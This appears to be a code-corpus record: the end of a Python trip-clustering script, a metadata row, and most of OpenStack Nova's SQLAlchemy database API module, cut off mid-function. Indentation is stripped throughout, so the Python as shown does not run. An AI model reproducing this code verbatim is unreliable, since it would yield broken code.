if b[0] == 'end':
point = self.reps[b[1]].trip_end_location
locs.append([point.lat, point.lon])
locs = numpy.mean(locs, axis=0)
coord = Coordinate(locs[0], locs[1])
self.locs.append(coord)
#create the input to the tour graph
def cluster_dict(self):
self.tour_dict = [0] * self.num_clusters
if not self.data:
self.tour_dict = []
self.self_loops_tour_dict = []
return
for i in range(self.num_clusters):
a = {'sections' : self.clusters[i]}
self.tour_dict[i] = a
for i in range(self.num_clusters):
start_places = []
end_places = []
for t in self.tour_dict[i]["sections"]:
start = esdpq.get_place(t.start_place)
end = esdpq.get_place(t.end_place)
start_places.append(start)
end_places.append(end)
self.tour_dict[i]["start_places"] = start_places
self.tour_dict[i]["end_places"] = end_places
for i in range(self.num_locations):
bin = self.bins[i]
for b in bin:
cluster = b[1]
label = b[0]
self.tour_dict[cluster][label] = i
for i in range(self.num_clusters):
cluster = self.tour_dict[i]
start_coords = self.locs[cluster['start']]
end_coords = self.locs[cluster['end']]
self.tour_dict[i]['start_coords'] = start_coords
self.tour_dict[i]['end_coords'] = end_coords
self.self_loops_tour_dict = copy.deepcopy(self.tour_dict)
for i in range(len(self.tour_dict)-1, -1, -1):
cluster = self.tour_dict[i]
if cluster['start'] == cluster['end'] and len(self.tour_dict) > 1:
self.tour_dict.remove(cluster)
newlocs = []
for cluster in self.tour_dict:
if cluster['start'] not in newlocs:
newlocs.append(cluster['start'])
if cluster['end'] not in newlocs:
newlocs.append(cluster['end'])
for i in range(len(self.tour_dict)):
self.tour_dict[i]['start'] = newlocs.index(self.tour_dict[i]['start'])
self.tour_dict[i]['end'] = newlocs.index(self.tour_dict[i]['end'])
#check whether a point is close to all points in a bin
def match(self, label, a, bin):
if label == 'start':
pointa = self.reps[a].trip_start_location
elif label == 'end':
pointa = self.reps[a].trip_end_location
for b in bin:
if b[0] == 'start':
pointb = self.reps[b[1]].trip_start_location
elif b[0] == 'end':
pointb = self.reps[b[1]].trip_end_location
if self.distance(pointa.lat, pointa.lon, pointb.lat, pointb.lon) > 300:
return False
return True
#the meter distance between two points
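# (haversine formula; R = 6371000 is the mean Earth radius in meters, so the result is in meters)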
def distance(self, lat1, lon1, lat2, lon2):
R = 6371000
rlat1 = math.radians(lat1)
rlat2 = math.radians(lat2)
lon = math.radians(lon2 - lon1)
lat = math.radians(lat2 - lat1)
a = math.sin(lat/2.0)**2 + math.cos(rlat1)*math.cos(rlat2) * math.sin(lon/2.0)**2
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1-a))
d = R * c
return d
|
bsd-3-clause
| -1,976,690,382,363,518,000
| 37.313084
| 128
| 0.523476
| false
| 3.822353
| false
| false
| false
|
shhui/nova
|
nova/db/sqlalchemy/api.py
|
1
|
220845
|
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Implementation of SQLAlchemy backend."""
import collections
import copy
import datetime
import functools
import sys
import time
import uuid
from oslo.config import cfg
import six
from sqlalchemy import and_
from sqlalchemy import Boolean
from sqlalchemy.exc import DataError
from sqlalchemy.exc import IntegrityError
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import or_
from sqlalchemy.orm import contains_eager
from sqlalchemy.orm import joinedload
from sqlalchemy.orm import joinedload_all
from sqlalchemy.orm import noload
from sqlalchemy.schema import Table
from sqlalchemy.sql.expression import asc
from sqlalchemy.sql.expression import desc
from sqlalchemy.sql.expression import select
from sqlalchemy.sql import func
from sqlalchemy import String
from nova import block_device
from nova.compute import task_states
from nova.compute import vm_states
import nova.context
from nova.db.sqlalchemy import models
from nova import exception
from nova.openstack.common.db import exception as db_exc
from nova.openstack.common.db.sqlalchemy import session as db_session
from nova.openstack.common.db.sqlalchemy import utils as sqlalchemyutils
from nova.openstack.common import excutils
from nova.openstack.common.gettextutils import _
from nova.openstack.common import log as logging
from nova.openstack.common import timeutils
from nova.openstack.common import uuidutils
from nova import quota
db_opts = [
cfg.StrOpt('osapi_compute_unique_server_name_scope',
default='',
help='When set, compute API will consider duplicate hostnames '
'invalid within the specified scope, regardless of case. '
'Should be empty, "project" or "global".'),
]
connection_opts = [
cfg.StrOpt('slave_connection',
secret=True,
help='The SQLAlchemy connection string used to connect to the '
'slave database'),
]
CONF = cfg.CONF
CONF.register_opts(db_opts)
CONF.register_opts(connection_opts, group='database')
CONF.import_opt('compute_topic', 'nova.compute.rpcapi')
CONF.import_opt('connection',
'nova.openstack.common.db.options',
group='database')
LOG = logging.getLogger(__name__)
_MASTER_FACADE = None
_SLAVE_FACADE = None
def _create_facade_lazily(use_slave=False):
global _MASTER_FACADE
global _SLAVE_FACADE
return_slave = use_slave and CONF.database.slave_connection
if not return_slave:
if _MASTER_FACADE is None:
_MASTER_FACADE = db_session.EngineFacade(
CONF.database.connection,
**dict(CONF.database.iteritems())
)
return _MASTER_FACADE
else:
if _SLAVE_FACADE is None:
_SLAVE_FACADE = db_session.EngineFacade(
CONF.database.slave_connection,
**dict(CONF.database.iteritems())
)
return _SLAVE_FACADE
def get_engine(use_slave=False):
facade = _create_facade_lazily(use_slave)
return facade.get_engine()
def get_session(use_slave=False, **kwargs):
facade = _create_facade_lazily(use_slave)
return facade.get_session(**kwargs)
_SHADOW_TABLE_PREFIX = 'shadow_'
_DEFAULT_QUOTA_NAME = 'default'
PER_PROJECT_QUOTAS = ['fixed_ips', 'floating_ips', 'networks']
def get_backend():
"""The backend is this module itself."""
return sys.modules[__name__]
def require_admin_context(f):
"""Decorator to require admin request context.
The first argument to the wrapped function must be the context.
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
nova.context.require_admin_context(args[0])
return f(*args, **kwargs)
return wrapper
def require_context(f):
"""Decorator to require *any* user or admin context.
This does no authorization for user or project access matching, see
:py:func:`nova.context.authorize_project_context` and
:py:func:`nova.context.authorize_user_context`.
The first argument to the wrapped function must be the context.
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
nova.context.require_context(args[0])
return f(*args, **kwargs)
return wrapper
def require_instance_exists_using_uuid(f):
"""Decorator to require the specified instance to exist.
Requires the wrapped function to use context and instance_uuid as
their first two arguments.
"""
@functools.wraps(f)
def wrapper(context, instance_uuid, *args, **kwargs):
instance_get_by_uuid(context, instance_uuid)
return f(context, instance_uuid, *args, **kwargs)
return wrapper
def require_aggregate_exists(f):
"""Decorator to require the specified aggregate to exist.
Requires the wrapped function to use context and aggregate_id as
their first two arguments.
"""
@functools.wraps(f)
def wrapper(context, aggregate_id, *args, **kwargs):
aggregate_get(context, aggregate_id)
return f(context, aggregate_id, *args, **kwargs)
return wrapper
def _retry_on_deadlock(f):
"""Decorator to retry a DB API call if Deadlock was received."""
@functools.wraps(f)
def wrapped(*args, **kwargs):
while True:
try:
return f(*args, **kwargs)
except db_exc.DBDeadlock:
LOG.warn(_("Deadlock detected when running "
"'%(func_name)s': Retrying..."),
dict(func_name=f.__name__))
# Retry!
time.sleep(0.5)
continue
functools.update_wrapper(wrapped, f)
return wrapped
def model_query(context, model, *args, **kwargs):
"""Query helper that accounts for context's `read_deleted` field.
:param context: context to query under
:param use_slave: If true, use slave_connection
:param session: if present, the session to use
:param read_deleted: if present, overrides context's read_deleted field.
:param project_only: if present and context is user-type, then restrict
query to match the context's project_id. If set to 'allow_none',
restriction includes project_id = None.
:param base_model: Where model_query is passed a "model" parameter which is
not a subclass of NovaBase, we should pass an extra base_model
parameter that is a subclass of NovaBase and corresponds to the
model parameter.
"""
use_slave = kwargs.get('use_slave') or False
if CONF.database.slave_connection == '':
use_slave = False
session = kwargs.get('session') or get_session(use_slave=use_slave)
read_deleted = kwargs.get('read_deleted') or context.read_deleted
project_only = kwargs.get('project_only', False)
def issubclassof_nova_base(obj):
return isinstance(obj, type) and issubclass(obj, models.NovaBase)
base_model = model
if not issubclassof_nova_base(base_model):
base_model = kwargs.get('base_model', None)
if not issubclassof_nova_base(base_model):
raise Exception(_("model or base_model parameter should be "
"subclass of NovaBase"))
query = session.query(model, *args)
default_deleted_value = base_model.__mapper__.c.deleted.default.arg
if read_deleted == 'no':
query = query.filter(base_model.deleted == default_deleted_value)
elif read_deleted == 'yes':
pass # omit the filter to include deleted and active
elif read_deleted == 'only':
query = query.filter(base_model.deleted != default_deleted_value)
else:
raise Exception(_("Unrecognized read_deleted value '%s'")
% read_deleted)
if nova.context.is_user_context(context) and project_only:
if project_only == 'allow_none':
query = query.\
filter(or_(base_model.project_id == context.project_id,
base_model.project_id == None))
else:
query = query.filter_by(project_id=context.project_id)
return query
def exact_filter(query, model, filters, legal_keys):
"""Applies exact match filtering to a query.
Returns the updated query. Modifies filters argument to remove
filters consumed.
:param query: query to apply filters to
:param model: model object the query applies to, for IN-style
filtering
:param filters: dictionary of filters; values that are lists,
tuples, sets, or frozensets cause an 'IN' test to
be performed, while exact matching ('==' operator)
is used for other values
:param legal_keys: list of keys to apply exact filtering to
"""
filter_dict = {}
# Walk through all the keys
for key in legal_keys:
# Skip ones we're not filtering on
if key not in filters:
continue
# OK, filtering on this key; what value do we search for?
value = filters.pop(key)
if key in ('metadata', 'system_metadata'):
column_attr = getattr(model, key)
if isinstance(value, list):
for item in value:
for k, v in item.iteritems():
query = query.filter(column_attr.any(key=k))
query = query.filter(column_attr.any(value=v))
else:
for k, v in value.iteritems():
query = query.filter(column_attr.any(key=k))
query = query.filter(column_attr.any(value=v))
elif isinstance(value, (list, tuple, set, frozenset)):
# Looking for values in a list; apply to query directly
column_attr = getattr(model, key)
query = query.filter(column_attr.in_(value))
else:
# OK, simple exact match; save for later
filter_dict[key] = value
# Apply simple exact matches
if filter_dict:
query = query.filter_by(**filter_dict)
return query
def convert_objects_related_datetimes(values, *datetime_keys):
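    """Parse string datetimes into datetime objects and strip their UTC
    timezone info for the given keys; values is modified in place and
    also returned.
    """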
for key in datetime_keys:
if key in values and values[key]:
if isinstance(values[key], six.string_types):
values[key] = timeutils.parse_strtime(values[key])
# NOTE(danms): Strip UTC timezones from datetimes, since they're
# stored that way in the database
values[key] = values[key].replace(tzinfo=None)
return values
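# The _sync_* helpers below recalculate current usage for a quota resource.
# They are looked up by name through QUOTA_SYNC_FUNCTIONS defined further
# down.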
def _sync_instances(context, project_id, user_id, session):
return dict(zip(('instances', 'cores', 'ram'),
_instance_data_get_for_user(
context, project_id, user_id, session)))
def _sync_floating_ips(context, project_id, user_id, session):
return dict(floating_ips=_floating_ip_count_by_project(
context, project_id, session))
def _sync_fixed_ips(context, project_id, user_id, session):
return dict(fixed_ips=_fixed_ip_count_by_project(
context, project_id, session))
def _sync_security_groups(context, project_id, user_id, session):
return dict(security_groups=_security_group_count_by_project_and_user(
context, project_id, user_id, session))
QUOTA_SYNC_FUNCTIONS = {
'_sync_instances': _sync_instances,
'_sync_floating_ips': _sync_floating_ips,
'_sync_fixed_ips': _sync_fixed_ips,
'_sync_security_groups': _sync_security_groups,
}
###################
def constraint(**conditions):
return Constraint(conditions)
def equal_any(*values):
return EqualityCondition(values)
def not_equal(*values):
return InequalityCondition(values)
class Constraint(object):
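    """A set of per-column conditions that can be applied to a query."""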
def __init__(self, conditions):
self.conditions = conditions
def apply(self, model, query):
for key, condition in self.conditions.iteritems():
for clause in condition.clauses(getattr(model, key)):
query = query.filter(clause)
return query
class EqualityCondition(object):
def __init__(self, values):
self.values = values
def clauses(self, field):
        # The method signature requires us to return an iterable, even though
        # for the OR operator this will actually be a single clause.
return [or_(*[field == value for value in self.values])]
class InequalityCondition(object):
def __init__(self, values):
self.values = values
def clauses(self, field):
return [field != value for value in self.values]
###################
@require_admin_context
def service_destroy(context, service_id):
session = get_session()
with session.begin():
count = model_query(context, models.Service, session=session).\
filter_by(id=service_id).\
soft_delete(synchronize_session=False)
if count == 0:
raise exception.ServiceNotFound(service_id=service_id)
model_query(context, models.ComputeNode, session=session).\
filter_by(service_id=service_id).\
soft_delete(synchronize_session=False)
def _service_get(context, service_id, with_compute_node=True, session=None):
query = model_query(context, models.Service, session=session).\
filter_by(id=service_id)
if with_compute_node:
query = query.options(joinedload('compute_node'))
result = query.first()
if not result:
raise exception.ServiceNotFound(service_id=service_id)
return result
@require_admin_context
def service_get(context, service_id):
return _service_get(context, service_id)
@require_admin_context
def service_get_all(context, disabled=None):
query = model_query(context, models.Service)
if disabled is not None:
query = query.filter_by(disabled=disabled)
return query.all()
@require_admin_context
def service_get_all_by_topic(context, topic):
return model_query(context, models.Service, read_deleted="no").\
filter_by(disabled=False).\
filter_by(topic=topic).\
all()
@require_admin_context
def service_get_by_host_and_topic(context, host, topic):
return model_query(context, models.Service, read_deleted="no").\
filter_by(disabled=False).\
filter_by(host=host).\
filter_by(topic=topic).\
first()
@require_admin_context
def service_get_all_by_host(context, host):
return model_query(context, models.Service, read_deleted="no").\
filter_by(host=host).\
all()
@require_admin_context
def service_get_by_compute_host(context, host):
result = model_query(context, models.Service, read_deleted="no").\
options(joinedload('compute_node')).\
filter_by(host=host).\
filter_by(topic=CONF.compute_topic).\
first()
if not result:
raise exception.ComputeHostNotFound(host=host)
return result
@require_admin_context
def service_get_by_args(context, host, binary):
result = model_query(context, models.Service).\
filter_by(host=host).\
filter_by(binary=binary).\
first()
if not result:
raise exception.HostBinaryNotFound(host=host, binary=binary)
return result
@require_admin_context
def service_create(context, values):
service_ref = models.Service()
service_ref.update(values)
if not CONF.enable_new_services:
service_ref.disabled = True
try:
service_ref.save()
except db_exc.DBDuplicateEntry as e:
if 'binary' in e.columns:
raise exception.ServiceBinaryExists(host=values.get('host'),
binary=values.get('binary'))
raise exception.ServiceTopicExists(host=values.get('host'),
topic=values.get('topic'))
return service_ref
@require_admin_context
def service_update(context, service_id, values):
session = get_session()
with session.begin():
service_ref = _service_get(context, service_id,
with_compute_node=False, session=session)
service_ref.update(values)
return service_ref
###################
def compute_node_get(context, compute_id):
return _compute_node_get(context, compute_id)
def _compute_node_get(context, compute_id, session=None):
result = model_query(context, models.ComputeNode, session=session).\
filter_by(id=compute_id).\
options(joinedload('service')).\
first()
if not result:
raise exception.ComputeHostNotFound(host=compute_id)
return result
@require_admin_context
def compute_node_get_by_service_id(context, service_id):
result = model_query(context, models.ComputeNode, read_deleted='no').\
filter_by(service_id=service_id).\
first()
if not result:
raise exception.ServiceNotFound(service_id=service_id)
return result
@require_admin_context
def compute_node_get_all(context, no_date_fields):
    # NOTE(msdubov): Using lower-level 'select' queries and joining the tables
    #                manually here gives roughly a 3x speed-up and about 5x
    #                less network load / memory usage compared to the sqla ORM.
engine = get_engine()
# Retrieve ComputeNode, Service
compute_node = models.ComputeNode.__table__
service = models.Service.__table__
with engine.begin() as conn:
redundant_columns = set(['deleted_at', 'created_at', 'updated_at',
'deleted']) if no_date_fields else set([])
def filter_columns(table):
return [c for c in table.c if c.name not in redundant_columns]
compute_node_query = select(filter_columns(compute_node)).\
where(compute_node.c.deleted == 0).\
order_by(compute_node.c.service_id)
compute_node_rows = conn.execute(compute_node_query).fetchall()
service_query = select(filter_columns(service)).\
where((service.c.deleted == 0) &
(service.c.binary == 'nova-compute')).\
order_by(service.c.id)
service_rows = conn.execute(service_query).fetchall()
# Join ComputeNode & Service manually.
services = {}
for proxy in service_rows:
services[proxy['id']] = dict(proxy.items())
compute_nodes = []
for proxy in compute_node_rows:
node = dict(proxy.items())
node['service'] = services.get(proxy['service_id'])
compute_nodes.append(node)
return compute_nodes
@require_admin_context
def compute_node_search_by_hypervisor(context, hypervisor_match):
field = models.ComputeNode.hypervisor_hostname
return model_query(context, models.ComputeNode).\
options(joinedload('service')).\
filter(field.like('%%%s%%' % hypervisor_match)).\
all()
@require_admin_context
def compute_node_create(context, values):
"""Creates a new ComputeNode and populates the capacity fields
with the most recent data.
"""
datetime_keys = ('created_at', 'deleted_at', 'updated_at')
convert_objects_related_datetimes(values, *datetime_keys)
compute_node_ref = models.ComputeNode()
compute_node_ref.update(values)
compute_node_ref.save()
return compute_node_ref
@require_admin_context
@_retry_on_deadlock
def compute_node_update(context, compute_id, values):
"""Updates the ComputeNode record with the most recent data."""
session = get_session()
with session.begin():
compute_ref = _compute_node_get(context, compute_id, session=session)
# Always update this, even if there's going to be no other
# changes in data. This ensures that we invalidate the
# scheduler cache of compute node data in case of races.
values['updated_at'] = timeutils.utcnow()
datetime_keys = ('created_at', 'deleted_at', 'updated_at')
convert_objects_related_datetimes(values, *datetime_keys)
compute_ref.update(values)
return compute_ref
@require_admin_context
def compute_node_delete(context, compute_id):
"""Delete a ComputeNode record."""
session = get_session()
with session.begin():
result = model_query(context, models.ComputeNode, session=session).\
filter_by(id=compute_id).\
soft_delete(synchronize_session=False)
if not result:
raise exception.ComputeHostNotFound(host=compute_id)
def compute_node_statistics(context):
"""Compute statistics over all compute nodes."""
result = model_query(context,
func.count(models.ComputeNode.id),
func.sum(models.ComputeNode.vcpus),
func.sum(models.ComputeNode.memory_mb),
func.sum(models.ComputeNode.local_gb),
func.sum(models.ComputeNode.vcpus_used),
func.sum(models.ComputeNode.memory_mb_used),
func.sum(models.ComputeNode.local_gb_used),
func.sum(models.ComputeNode.free_ram_mb),
func.sum(models.ComputeNode.free_disk_gb),
func.sum(models.ComputeNode.current_workload),
func.sum(models.ComputeNode.running_vms),
func.sum(models.ComputeNode.disk_available_least),
base_model=models.ComputeNode,
read_deleted="no").first()
# Build a dict of the info--making no assumptions about result
fields = ('count', 'vcpus', 'memory_mb', 'local_gb', 'vcpus_used',
'memory_mb_used', 'local_gb_used', 'free_ram_mb', 'free_disk_gb',
'current_workload', 'running_vms', 'disk_available_least')
return dict((field, int(result[idx] or 0))
for idx, field in enumerate(fields))
###################
@require_admin_context
def certificate_create(context, values):
certificate_ref = models.Certificate()
for (key, value) in values.iteritems():
certificate_ref[key] = value
certificate_ref.save()
return certificate_ref
@require_admin_context
def certificate_get_all_by_project(context, project_id):
return model_query(context, models.Certificate, read_deleted="no").\
filter_by(project_id=project_id).\
all()
@require_admin_context
def certificate_get_all_by_user(context, user_id):
return model_query(context, models.Certificate, read_deleted="no").\
filter_by(user_id=user_id).\
all()
@require_admin_context
def certificate_get_all_by_user_and_project(context, user_id, project_id):
return model_query(context, models.Certificate, read_deleted="no").\
filter_by(user_id=user_id).\
filter_by(project_id=project_id).\
all()
###################
@require_context
def floating_ip_get(context, id):
try:
result = model_query(context, models.FloatingIp, project_only=True).\
filter_by(id=id).\
options(joinedload_all('fixed_ip.instance')).\
first()
if not result:
raise exception.FloatingIpNotFound(id=id)
except DataError:
msg = _("Invalid floating ip id %s in request") % id
LOG.warn(msg)
raise exception.InvalidID(id=id)
return result
@require_context
def floating_ip_get_pools(context):
pools = []
for result in model_query(context, models.FloatingIp.pool,
base_model=models.FloatingIp).distinct():
pools.append({'name': result[0]})
return pools
@require_context
def floating_ip_allocate_address(context, project_id, pool,
auto_assigned=False):
nova.context.authorize_project_context(context, project_id)
session = get_session()
with session.begin():
floating_ip_ref = model_query(context, models.FloatingIp,
session=session, read_deleted="no").\
filter_by(fixed_ip_id=None).\
filter_by(project_id=None).\
filter_by(pool=pool).\
with_lockmode('update').\
first()
# NOTE(vish): if with_lockmode isn't supported, as in sqlite,
# then this has concurrency issues
if not floating_ip_ref:
raise exception.NoMoreFloatingIps()
floating_ip_ref['project_id'] = project_id
floating_ip_ref['auto_assigned'] = auto_assigned
session.add(floating_ip_ref)
return floating_ip_ref['address']
@require_context
def floating_ip_bulk_create(context, ips):
session = get_session()
with session.begin():
for ip in ips:
model = models.FloatingIp()
model.update(ip)
try:
                # NOTE(boris-42): To detect an existing address we have to
                #                 call session.flush() on each iteration.
session.add(model)
session.flush()
except db_exc.DBDuplicateEntry:
raise exception.FloatingIpExists(address=ip['address'])
def _ip_range_splitter(ips, block_size=256):
"""Yields blocks of IPs no more than block_size elements long."""
out = []
count = 0
for ip in ips:
out.append(ip['address'])
count += 1
if count > block_size - 1:
yield out
out = []
count = 0
if out:
yield out
@require_context
def floating_ip_bulk_destroy(context, ips):
session = get_session()
with session.begin():
project_id_to_quota_count = collections.defaultdict(int)
for ip_block in _ip_range_splitter(ips):
# Find any floating IPs that were not auto_assigned and
# thus need quota released.
query = model_query(context, models.FloatingIp).\
filter(models.FloatingIp.address.in_(ip_block)).\
filter_by(auto_assigned=False)
rows = query.all()
for row in rows:
# The count is negative since we release quota by
# reserving negative quota.
project_id_to_quota_count[row['project_id']] -= 1
# Delete the floating IPs.
model_query(context, models.FloatingIp).\
filter(models.FloatingIp.address.in_(ip_block)).\
soft_delete(synchronize_session='fetch')
# Delete the quotas, if needed.
for project_id, count in project_id_to_quota_count.iteritems():
try:
reservations = quota.QUOTAS.reserve(context,
project_id=project_id,
floating_ips=count)
quota.QUOTAS.commit(context,
reservations,
project_id=project_id)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_("Failed to update usages bulk "
"deallocating floating IP"))
@require_context
def floating_ip_create(context, values):
floating_ip_ref = models.FloatingIp()
floating_ip_ref.update(values)
try:
floating_ip_ref.save()
except db_exc.DBDuplicateEntry:
raise exception.FloatingIpExists(address=values['address'])
return floating_ip_ref
def _floating_ip_count_by_project(context, project_id, session=None):
nova.context.authorize_project_context(context, project_id)
# TODO(tr3buchet): why leave auto_assigned floating IPs out?
return model_query(context, models.FloatingIp, read_deleted="no",
session=session).\
filter_by(project_id=project_id).\
filter_by(auto_assigned=False).\
count()
@require_context
@_retry_on_deadlock
def floating_ip_fixed_ip_associate(context, floating_address,
fixed_address, host):
session = get_session()
with session.begin():
floating_ip_ref = _floating_ip_get_by_address(context,
floating_address,
session=session)
fixed_ip_ref = model_query(context, models.FixedIp, session=session).\
filter_by(address=fixed_address).\
options(joinedload('network')).\
first()
if floating_ip_ref.fixed_ip_id == fixed_ip_ref["id"]:
return None
floating_ip_ref.fixed_ip_id = fixed_ip_ref["id"]
floating_ip_ref.host = host
return fixed_ip_ref
@require_context
def floating_ip_deallocate(context, address):
model_query(context, models.FloatingIp).\
filter_by(address=address).\
update({'project_id': None,
'host': None,
'auto_assigned': False})
@require_context
def floating_ip_destroy(context, address):
model_query(context, models.FloatingIp).\
filter_by(address=address).\
delete()
@require_context
def floating_ip_disassociate(context, address):
session = get_session()
with session.begin():
floating_ip_ref = model_query(context,
models.FloatingIp,
session=session).\
filter_by(address=address).\
first()
if not floating_ip_ref:
raise exception.FloatingIpNotFoundForAddress(address=address)
fixed_ip_ref = model_query(context, models.FixedIp, session=session).\
filter_by(id=floating_ip_ref['fixed_ip_id']).\
options(joinedload('network')).\
first()
floating_ip_ref.fixed_ip_id = None
floating_ip_ref.host = None
return fixed_ip_ref
@require_context
def floating_ip_set_auto_assigned(context, address):
model_query(context, models.FloatingIp).\
filter_by(address=address).\
update({'auto_assigned': True})
def _floating_ip_get_all(context, session=None):
return model_query(context, models.FloatingIp, read_deleted="no",
session=session)
@require_admin_context
def floating_ip_get_all(context):
floating_ip_refs = _floating_ip_get_all(context).all()
if not floating_ip_refs:
raise exception.NoFloatingIpsDefined()
return floating_ip_refs
@require_admin_context
def floating_ip_get_all_by_host(context, host):
floating_ip_refs = _floating_ip_get_all(context).\
filter_by(host=host).\
all()
if not floating_ip_refs:
raise exception.FloatingIpNotFoundForHost(host=host)
return floating_ip_refs
@require_context
def floating_ip_get_all_by_project(context, project_id):
nova.context.authorize_project_context(context, project_id)
# TODO(tr3buchet): why do we not want auto_assigned floating IPs here?
return _floating_ip_get_all(context).\
filter_by(project_id=project_id).\
filter_by(auto_assigned=False).\
options(joinedload_all('fixed_ip.instance')).\
all()
@require_context
def floating_ip_get_by_address(context, address):
return _floating_ip_get_by_address(context, address)
def _floating_ip_get_by_address(context, address, session=None):
# if address string is empty explicitly set it to None
if not address:
address = None
try:
result = model_query(context, models.FloatingIp, session=session).\
filter_by(address=address).\
options(joinedload_all('fixed_ip.instance')).\
first()
if not result:
raise exception.FloatingIpNotFoundForAddress(address=address)
except DataError:
msg = _("Invalid floating IP %s in request") % address
LOG.warn(msg)
raise exception.InvalidIpAddressError(msg)
# If the floating IP has a project ID set, check to make sure
# the non-admin user has access.
if result.project_id and nova.context.is_user_context(context):
nova.context.authorize_project_context(context, result.project_id)
return result
@require_context
def floating_ip_get_by_fixed_address(context, fixed_address):
return model_query(context, models.FloatingIp).\
outerjoin(models.FixedIp,
models.FixedIp.id ==
models.FloatingIp.fixed_ip_id).\
filter(models.FixedIp.address == fixed_address).\
all()
@require_context
def floating_ip_get_by_fixed_ip_id(context, fixed_ip_id):
return model_query(context, models.FloatingIp).\
filter_by(fixed_ip_id=fixed_ip_id).\
all()
@require_context
def floating_ip_update(context, address, values):
session = get_session()
with session.begin():
float_ip_ref = _floating_ip_get_by_address(context, address, session)
float_ip_ref.update(values)
try:
float_ip_ref.save(session=session)
except db_exc.DBDuplicateEntry:
raise exception.FloatingIpExists(address=values['address'])
def _dnsdomain_get(context, session, fqdomain):
return model_query(context, models.DNSDomain,
session=session, read_deleted="no").\
filter_by(domain=fqdomain).\
with_lockmode('update').\
first()
@require_context
def dnsdomain_get(context, fqdomain):
session = get_session()
with session.begin():
return _dnsdomain_get(context, session, fqdomain)
def _dnsdomain_get_or_create(context, session, fqdomain):
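    """Return the DNSDomain for fqdomain, building a new (unsaved) record
    if none exists; callers are responsible for adding it to the session.
    """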
domain_ref = _dnsdomain_get(context, session, fqdomain)
if not domain_ref:
dns_ref = models.DNSDomain()
dns_ref.update({'domain': fqdomain,
'availability_zone': None,
'project_id': None})
return dns_ref
return domain_ref
@require_admin_context
def dnsdomain_register_for_zone(context, fqdomain, zone):
session = get_session()
with session.begin():
domain_ref = _dnsdomain_get_or_create(context, session, fqdomain)
domain_ref.scope = 'private'
domain_ref.availability_zone = zone
session.add(domain_ref)
@require_admin_context
def dnsdomain_register_for_project(context, fqdomain, project):
session = get_session()
with session.begin():
domain_ref = _dnsdomain_get_or_create(context, session, fqdomain)
domain_ref.scope = 'public'
domain_ref.project_id = project
session.add(domain_ref)
@require_admin_context
def dnsdomain_unregister(context, fqdomain):
model_query(context, models.DNSDomain).\
filter_by(domain=fqdomain).\
delete()
@require_context
def dnsdomain_list(context):
query = model_query(context, models.DNSDomain, read_deleted="no")
return [row.domain for row in query.all()]
def dnsdomain_get_all(context):
return model_query(context, models.DNSDomain, read_deleted="no").all()
###################
@require_admin_context
def fixed_ip_associate(context, address, instance_uuid, network_id=None,
reserved=False):
"""Keyword arguments:
    reserved -- should be a boolean value (True or False); the exact value
    will be used to filter on the fixed IP address
"""
if not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
session = get_session()
with session.begin():
network_or_none = or_(models.FixedIp.network_id == network_id,
models.FixedIp.network_id == None)
fixed_ip_ref = model_query(context, models.FixedIp, session=session,
read_deleted="no").\
filter(network_or_none).\
filter_by(reserved=reserved).\
filter_by(address=address).\
with_lockmode('update').\
first()
# NOTE(vish): if with_lockmode isn't supported, as in sqlite,
# then this has concurrency issues
if fixed_ip_ref is None:
raise exception.FixedIpNotFoundForNetwork(address=address,
network_uuid=network_id)
if fixed_ip_ref.instance_uuid:
raise exception.FixedIpAlreadyInUse(address=address,
instance_uuid=instance_uuid)
if not fixed_ip_ref.network_id:
fixed_ip_ref.network_id = network_id
fixed_ip_ref.instance_uuid = instance_uuid
session.add(fixed_ip_ref)
return fixed_ip_ref
@require_admin_context
def fixed_ip_associate_pool(context, network_id, instance_uuid=None,
host=None):
if instance_uuid and not uuidutils.is_uuid_like(instance_uuid):
raise exception.InvalidUUID(uuid=instance_uuid)
session = get_session()
with session.begin():
network_or_none = or_(models.FixedIp.network_id == network_id,
models.FixedIp.network_id == None)
fixed_ip_ref = model_query(context, models.FixedIp, session=session,
read_deleted="no").\
filter(network_or_none).\
filter_by(reserved=False).\
filter_by(instance_uuid=None).\
filter_by(host=None).\
with_lockmode('update').\
first()
# NOTE(vish): if with_lockmode isn't supported, as in sqlite,
# then this has concurrency issues
if not fixed_ip_ref:
raise exception.NoMoreFixedIps()
if fixed_ip_ref['network_id'] is None:
            fixed_ip_ref['network_id'] = network_id
if instance_uuid:
fixed_ip_ref['instance_uuid'] = instance_uuid
if host:
fixed_ip_ref['host'] = host
session.add(fixed_ip_ref)
return fixed_ip_ref
@require_context
def fixed_ip_create(context, values):
fixed_ip_ref = models.FixedIp()
fixed_ip_ref.update(values)
try:
fixed_ip_ref.save()
except db_exc.DBDuplicateEntry:
raise exception.FixedIpExists(address=values['address'])
return fixed_ip_ref
@require_context
def fixed_ip_bulk_create(context, ips):
session = get_session()
with session.begin():
for ip in ips:
model = models.FixedIp()
model.update(ip)
try:
                # NOTE (vsergeyev): To detect an existing address we have to
                #                   call session.flush() on each iteration.
                #                   See the related note in
                #                   floating_ip_bulk_create().
session.add(model)
session.flush()
except db_exc.DBDuplicateEntry:
raise exception.FixedIpExists(address=ip['address'])
@require_context
def fixed_ip_disassociate(context, address):
session = get_session()
with session.begin():
_fixed_ip_get_by_address(context, address, session=session).\
update({'instance_uuid': None})
@require_admin_context
def fixed_ip_disassociate_all_by_timeout(context, host, time):
session = get_session()
    # NOTE(vish): only update fixed ips that "belong" to this
    #             host; i.e. the network host or the instance
    #             host matches. Two queries are necessary because
    #             a join with update doesn't work.
with session.begin():
host_filter = or_(and_(models.Instance.host == host,
models.Network.multi_host == True),
models.Network.host == host)
result = model_query(context, models.FixedIp.id,
